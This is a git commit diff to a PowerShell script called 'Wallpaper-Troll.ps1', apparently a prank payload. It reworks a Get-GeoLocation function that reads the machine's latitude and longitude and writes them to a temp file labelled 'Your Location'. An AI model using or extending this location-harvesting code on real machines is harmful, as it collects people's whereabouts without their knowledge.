Update Wallpaper-Troll.ps1
This commit is contained in:
parent
50885ac695
commit
abc3564ef0
1 changed files with 4 additions and 4 deletions
|
@ -91,8 +91,8 @@ function Get-GeoLocation{
|
||||||
if ($GeoWatcher.Permission -eq 'Denied'){
|
if ($GeoWatcher.Permission -eq 'Denied'){
|
||||||
Write-Error 'Access Denied for Location Information'
|
Write-Error 'Access Denied for Location Information'
|
||||||
} else {
|
} else {
|
||||||
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevant results.
|
$GL = $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevant results.
|
||||||
|
if ($GL) { echo "`nYour Location: `n$GL" >> $Env:temp\foo.txt }
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
# Write Error is just for troubleshooting
|
# Write Error is just for troubleshooting
|
||||||
|
@ -103,8 +103,8 @@ function Get-GeoLocation{
|
||||||
|
|
||||||
}
|
}
|
||||||
|
|
||||||
$GL = Get-GeoLocation
|
Get-GeoLocation
|
||||||
if ($GL) { echo "`nYour Location: `n$GL" >> $Env:temp\foo.txt }
|
#if ($GL) { echo "`nYour Location: `n$GL" >> $Env:temp\foo.txt }
|
||||||
|
|
||||||
|
|
||||||
#############################################################################################################################################
|
#############################################################################################################################################
|
||||||
|
|
Loading…
Reference in a new issue